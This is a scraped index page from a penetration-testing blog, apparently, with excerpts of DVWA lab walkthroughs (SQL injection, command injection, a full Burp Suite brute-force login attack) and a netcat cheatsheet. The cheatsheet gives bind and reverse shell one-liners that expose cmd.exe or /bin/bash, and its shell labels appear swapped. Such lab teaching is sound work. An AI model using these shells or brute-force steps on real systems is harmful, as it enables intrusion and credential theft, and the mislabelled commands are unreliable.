OpenSSH Documentation
Add Date to NMap Filenames
Snippet to add the current date to the nmap output filename.
Mounting VMWare Shared Folders on Linux (Kali)
Create a new file with the following contents: Save as mount-shared-folders.sh Make the file executable Run the script as root Your shared folders from the host computer should not be accessible at /mnt/hgfs
DVWA Walkthrough Part 6: SQL Injection
For the sixth installment of our Damn Vulnerable Web App walkthrough we will use a SQL injection vulnerability to obtain all of the usernames and passwords within the application. This is another very simple to exploit and really doesn’t require the aid of Burp Suite at all. In a more complex application we may want to use tools like Burp Suite…
Netcat Cheatsheet
Bind and Reverse Shells (Windows) Netcat bind shell C:\> nc 10.1.1.1 4444 –exec cmd.exe (Windows) Netcat reverse shell C:\> nc -lp 31337 –exec cmd.exe (Linux) Netcat bind shell victim:~# nc 10.1.1.1 4444 -e /bin/bash (Linux) Netcat reverse shell victim:~# nc -lp 31337 -e /bin/bash Moving Files On Source: source:~# nc 10.1.1.1 4444 < input.txt On Destination: destination:~# nc -lp…
DVWA Walkthrough Part 3: Command Injection
For the third installment of our Damn Vulnerable Web App walkthrough we will tackle command injection via the web. This is very simple to exploit and really doesn’t require the aid of Burp Suite at all. The intended use of this app is for the user to enter an IP address and the server will run the ping command against the provided…
DVWA Walkthrough Part 2: Brute Force
The objective of Part 2 of this walkthrough is to brute force the logon mechanism of the Damn Vulnerable Web App (DVWA) in order to obtain a valid username and password of the administrator account. To accomplish this we will use Burp Suite. Before you start make sure you have completed the setup steps in: Burp Suite Tutorial – Part 1: Setup.
In your web browser navigate to http://<IP address>/vulnerabilities/brute/
Next, make sure that “Intercept is on” is enabled and submit the form. Burp will intercept the traffic and display the HTTP request made to the server by your browser. From the Action drop down select “Send to Intruder”.
Navigate to the Intruder tab. The intruder module is useful for fuzzing specific parameters within a request. The § symbol indicates where Burp will insert it’s payloads into each request.
In this case we want to brute force the username and password arguments. We do not want to brute force the login, PHPSESSID, or security arguments so highlight those and select ‘Clear §’ to remove the placeholders.
Switch the “Attack type” drop down to Cluster Bomb. This mode will use separate lists to fuzz the username and password arguments and will try all combinations.
Next , select the Payloads tab. For this payload we want to pass in a list of user names. We will use a simple list of usernames in this example.
Next, select payload 2 from the Payload set drop down. This time we will provide a simple list of passwords to guess.
Select Intruder > Start attack
Finally, we can see each request that has been sent to the server, and the combinations of usernames and passwords that we provided.
We can see that the length of the server response in request #1 has changed significantly from the baseline request and other requests. This is interesting and should be investigated. Request #1 has the correct username and password combination. We can validate that we have successfully gained access to the admin account by clicking “Response” > “Render”. Where we are greated with the text “Welcome to the password protected area admin”.
Whenever you are fuzzing with Burp check the Length of the responses as it may be an indication of a weakness.
Damn Vulnerable Web App (DVWA) is an intentionally vulnerable PHP/MySQL web application for penetration testers to use to learn and practice exploiting many types of common web vulnerabilities. GETTING DVWA DVWA code is available from http://www.dvwa.co.uk however, there is a preloaded Linux server available from vulnhub.com. The quickest way to get started is to download the .iso file and boot the…
Thats it for part 2! You can now see how easy it is to quickly automate HTTP/HTTPS fuzzing using Burp Suite.
DVWA Walkthrough Part 1: Setup